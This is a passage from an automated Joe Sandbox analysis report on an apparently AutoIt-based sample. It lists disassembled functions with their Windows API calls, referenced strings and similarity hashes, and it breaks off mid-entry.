Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 820baadc2a7ea5081ac9a4a9d9591d32f734ae8aad2e8e6ca47153e9d7c38d3d
Instruction ID: 27b0b5059f190284abde48b0e1265e405136d2bad8f31eda0f642980aa22addc
Opcode Fuzzy Hash: 820baadc2a7ea5081ac9a4a9d9591d32f734ae8aad2e8e6ca47153e9d7c38d3d
Instruction Fuzzy Hash: EA110576400149BFEF029F95EC88EEA7FADEB08354F048022FE094A160D7719D95DBA4

Function 004387D7 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 004387D7

Part of subcall function 00431E5A: __initp_misc_winsig.LIBCMT ref: 00431E7E
Part of subcall function 00431E5A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00438BE1
Part of subcall function 00431E5A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00438BF5
Part of subcall function 00431E5A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00438C08
Part of subcall function 00431E5A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00438C1B
Part of subcall function 00431E5A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00438C2E
Part of subcall function 00431E5A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00438C41
Part of subcall function 00431E5A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00438C54
Part of subcall function 00431E5A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00438C67
Part of subcall function 00431E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00438C7A
Part of subcall function 00431E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00438C8D
Part of subcall function 00431E5A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00438CA0
Part of subcall function 00431E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00438CB3
Part of subcall function 00431E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00438CC6
Part of subcall function 00431E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00438CD9
Part of subcall function 00431E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00438CEC
Part of subcall function 00431E5A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00438CFF

__mtinitlocks.LIBCMT ref: 004387DC

Part of subcall function 00438AB3: InitializeCriticalSectionAndSpinCount.KERNEL32(004CAC68,00000FA0,?,?,004387E1,00436AFA,004C67D8,00000014), ref: 00438AD1

__mtterm.LIBCMT ref: 004387E5

Part of subcall function 0043884D: RtlDeleteCriticalSection.NTDLL(00000000), ref: 004389CF
Part of subcall function 0043884D: _free.LIBCMT ref: 004389D6
Part of subcall function 0043884D: RtlDeleteCriticalSection.NTDLL(004CAC68), ref: 004389F8

__calloc_crt.LIBCMT ref: 0043880A
GetCurrentThreadId.KERNEL32 ref: 00438833

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
String ID:
API String ID: 2942034483-0
Opcode ID: 7a8a70a49e1fa003ae394cc4fdf4b41a57f279f19424dac8e417fb3cf5cf8cf6
Instruction ID: 41a521e43eaea6d6de0f5832c8099bfd5a90211f79dd603185c0fa61a4e2606a
Opcode Fuzzy Hash: 7a8a70a49e1fa003ae394cc4fdf4b41a57f279f19424dac8e417fb3cf5cf8cf6
Instruction Fuzzy Hash: FCF09A331197115AE2687B3ABC07B4BAAC08F0977CF712A2FF4A0D61E2FF589841456C

Function 0045A3D2 Relevance: 9.0, APIs: 6, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 1423608774-0
Opcode ID: c86fa7cd9af5db044962311357b70b4bcfcfbe99f4229294bfa6d8966acbb1f4
Instruction ID: 94765fa90258eba84d08de2a474781e13b103c1f4172bb89b40bf77c21351945
Opcode Fuzzy Hash: c86fa7cd9af5db044962311357b70b4bcfcfbe99f4229294bfa6d8966acbb1f4
Instruction Fuzzy Hash: A201F432501611EBD7252B64EC48DEB77A9FF99307B40027BFD03921A2CB78AC14CB69

Function 00411867 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00411898
MapVirtualKeyW.USER32(00000010,00000000), ref: 004118A0
MapVirtualKeyW.USER32(000000A0,00000000), ref: 004118AB
MapVirtualKeyW.USER32(000000A1,00000000), ref: 004118B6
MapVirtualKeyW.USER32(00000011,00000000), ref: 004118BE
MapVirtualKeyW.USER32(00000012,00000000), ref: 004118C6

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: d77758887a1137d9a0bc5c6a0cc1d8603f97f8869aa1c3c3959761ca4b248490
Instruction ID: ded7ea6f31b3e6791357cb6fb861881472fe5ab9b8c584ca2f80d62896011e1f
Opcode Fuzzy Hash: d77758887a1137d9a0bc5c6a0cc1d8603f97f8869aa1c3c3959761ca4b248490
Instruction Fuzzy Hash: BC0167B0902B5ABDE3008F6A8C85B52FFB8FF59354F04411BA15C47A42C7F5A864CBE5

Function 004584F4 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00458504
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0045851A
GetWindowThreadProcessId.USER32(?,?), ref: 00458529
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00458538
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00458542
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00458549

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: cf4254c456a1414966747afe85e7d693ef6af60cfe5bfdfacf03559005fb2284
Instruction ID: c58947a5eb5e73304ad414f237d1c47c6a117a4ea062403f558bc55f5b2ee831
Opcode Fuzzy Hash: cf4254c456a1414966747afe85e7d693ef6af60cfe5bfdfacf03559005fb2284
Instruction Fuzzy Hash: 3AF03073A40158BBE72157529D0EEEF7A7CDFE6B15F00007AFA0592051EBA46E01C6B9

Function 0045A31D Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 0045A330
RtlEnterCriticalSection.NTDLL(?), ref: 0045A341
TerminateThread.KERNEL32(?,000001F6,?,?,?,004866D3,?,?,?,?,?,0041E681), ref: 0045A34E
WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,004866D3,?,?,?,?,?,0041E681), ref: 0045A35B

Part of subcall function 00459CCE: CloseHandle.KERNEL32(?,?,0045A368,?,?,?,004866D3,?,?,?,?,?,0041E681), ref: 00459CD8

InterlockedExchange.KERNEL32(?,000001F6), ref: 0045A36E
RtlLeaveCriticalSection.NTDLL(?), ref: 0045A375

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 0c1bbd3d4190c84ceaa015872e21237d0ee27c959346634548299c79833c5913
Instruction ID: c4860ca3e24dd29f4d1621bed25fe1043b034b9f8cf65ba583c96ed53a18ef4d
Opcode Fuzzy Hash: 0c1bbd3d4190c84ceaa015872e21237d0ee27c959346634548299c79833c5913
Instruction Fuzzy Hash: 7DF08232941211ABD3112B64ED4CDDB7B79FF99302F400573FA03921B2CBB59915CB59

Function 0041C320 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 259fileCOMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0041C419
ReadFile.KERNEL32(?,?,00010000,?,00000000,?,?,00000000,?,00456653,?,?,00000000), ref: 0041C495

Strings

SfE, xrefs: 004848B8, 0048487C, 00484839

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: FileRead_memmove
String ID: SfE
API String ID: 1325644223-2762617029
Opcode ID: 2ad51c5ba48d69e489009f9ce113567ce23509bd049c466b94e2a3a78151b027
Instruction ID: 1594f25ab86ef9f662a0c6800a0ffaf4b84b95e43e29d08df9f00108cf3b901c
Opcode Fuzzy Hash: 2ad51c5ba48d69e489009f9ce113567ce23509bd049c466b94e2a3a78151b027
Instruction Fuzzy Hash: C6A1E030A04619EBDF00DF65C884BAEFBB0FF05300F14C59AE8659A381D739D9A1CB99

Function 0042D7C7 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON

Download Yara Rule

APIs

Part of subcall function 0043010A: std::exception::exception.LIBCMT ref: 0043013E
Part of subcall function 0043010A: __CxxThrowException@8.LIBCMT ref: 00430153

Part of subcall function 0041CAEE: _memmove.LIBCMT ref: 0041CB2F

Part of subcall function 0041BBD9: _memmove.LIBCMT ref: 0041BC33

__swprintf.LIBCMT ref: 0042D98F

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0042D832

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: 69a9d542230fc4b03b6784cbc71277934c181ceb289f164eaf8bd1be6334bf31
Instruction ID: 357a4216d76bb5aa32af5797c95631869dfe938907606b2ebef9218daea7dd4c
Opcode Fuzzy Hash: 69a9d542230fc4b03b6784cbc71277934c181ceb289f164eaf8bd1be6334bf31
Instruction Fuzzy Hash: FF91BD71A082119FC714FF25D881DAFB7A4EF85704F40095FF886972A1EB28ED44CB9A

Function 0046B482 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0046B4A8
CharUpperBuffW.USER32(?,?), ref: 0046B5B7
VariantClear.OLEAUT32(?), ref: 0046B73A

Part of subcall function 0045A6F6: VariantInit.OLEAUT32(00000000), ref: 0045A736
Part of subcall function 0045A6F6: VariantCopy.OLEAUT32(?,?), ref: 0045A73F
Part of subcall function 0045A6F6: VariantClear.OLEAUT32(?), ref: 0045A74B

Strings

Incorrect Parameter format, xrefs: 0046B4E0, 0046B6AD
AUTOIT.ERROR, xrefs: 0046B5BD

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: f947576b1c93d31f24b974e8624864fe9236f157863c59b814443f80f6310d3a
Instruction ID: 97e8cb543abcbb4ebc57965c4fb67c79ed67950d33b4d5d8b7cba6b4a7ca4e62
Opcode Fuzzy Hash: f947576b1c93d31f24b974e8624864fe9236f157863c59b814443f80f6310d3a
Instruction Fuzzy Hash: E2915B746043019FC710DF25C48199AB7E4EFC9718F14486EF88ADB352EB35E985CB96

Function 00455D65 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00413BCF: _wcscpy.LIBCMT ref: 00413BF2

_memset.LIBCMT ref: 00455E56
GetMenuItemInfoW.USER32(?), ref: 00455E85
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00455F31
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00455F5B

Strings

0, xrefs: 00455E4E

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 9dcb43afcf61bafc7667811ba7d8b85c531678a5347e31cbbd03b48dc8967d04
Instruction ID: ebdad5b1119d56dfccf468f11aca379777d4c17065e8e1150b24d57d85559151
Opcode Fuzzy Hash: 9dcb43afcf61bafc7667811ba7d8b85c531678a5347e31cbbd03b48dc8967d04
Instruction Fuzzy Hash: 64511332514701AAD3149B28C8656BBB7A4AF49315F08052FFC91D32A2D768CD48C79A

Function 00451050 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 004510B8
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 004510EE
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 004510FF
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00451181

Strings

DllGetClassObject, xrefs: 004510F4

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 6e2d3797e554f9c4c993e172a1cd95f53ab7aed0a60d09cb426ecc72d1a9a6f8
Instruction ID: cd228c8559fa8b1e6c37f8a97a81fbe9c58fe2a05b12447feb10bae445744e13
Opcode Fuzzy Hash: 6e2d3797e554f9c4c993e172a1cd95f53ab7aed0a60d09cb426ecc72d1a9a6f8
Instruction Fuzzy Hash: 40419F71600604AFDB01CF64C885B9B7BA9EF48355F1080AEEE05DF21AD7B8D948CBA4

Function 00455A25 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00455A93
GetMenuItemInfoW.USER32 ref: 00455AAF
DeleteMenu.USER32(00000004,00000007,00000000), ref: 00455AF5
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,004D18F0,00000000), ref: 00455B3E

Strings

0, xrefs: 00455A8B

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 2031ad57f96a1a61a6864a9162ee593d9c10d81542ecaebf4ac60a66ac7c696f
Instruction ID: 12a30425a30eed84f86e7aa66536036ce79296f02bc69565b6f6abfc82ea7b7f
Opcode Fuzzy Hash: 2031ad57f96a1a61a6864a9162ee593d9c10d81542ecaebf4ac60a66ac7c696f
Instruction Fuzzy Hash: 5641D271604701AFD710DF24D8A4B2BB7E4AF88315F14461EF855972D2D774E908CB6A

Function 00470458 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?), ref: 00470478

Part of subcall function 00417F40: _memmove.LIBCMT ref: 00417F8F

Part of subcall function 0041A2FB: _memmove.LIBCMT ref: 0041A33D

Strings

cdecl, xrefs: 004704CF
stdcall, xrefs: 004704FA
none, xrefs: 00470553
winapi, xrefs: 004704E9

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: _memmove$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 2411302734-567219261
Opcode ID: f1481aaa4bc87c75958f454e204a94cbd3bfa2243b3b950d770c70ce37912ef0
Instruction ID: 0fe429b3f81d8e7c709bbadf99c58e086f09ea3e596c43a6b6091e3b59a4a9a2
Opcode Fuzzy Hash: f1481aaa4bc87c75958f454e204a94cbd3bfa2243b3b950d770c70ce37912ef0
Instruction Fuzzy Hash: 5B31AE74600619EBCB00EF59C940AEEB3B5FF05354B50862FE866972D1DB39E905CB88

Function 0044C600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0041CAEE: _memmove.LIBCMT ref: 0041CB2F

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0044C684
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0044C697
SendMessageW.USER32(?,00000189,?,00000000), ref: 0044C6C7

Part of subcall function 00417E53: _memmove.LIBCMT ref: 00417EB9

Strings

ComboBox, xrefs: 0044C60B
ListBox, xrefs: 0044C643

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: MessageSend$_memmove
String ID: ComboBox$ListBox
API String ID: 458670788-1403004172
Opcode ID: c087a7e58f0c11f953d1b03bf41868e3afc7914976435a64b83423a254a67e2a
Instruction ID: e7b59ac4f37f97cf7d41f3b3d6f4e9439af8df7a88c7d4a1ecbafd8531226d89
Opcode Fuzzy Hash: c087a7e58f0c11f953d1b03bf41868e3afc7914976435a64b83423a254a67e2a
Instruction Fuzzy Hash: 95212071901104AEEB04EB65CC82EFFB7B89F05314F15822BF422A31E0DBBD4C4A9658

Function 00464A41 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON

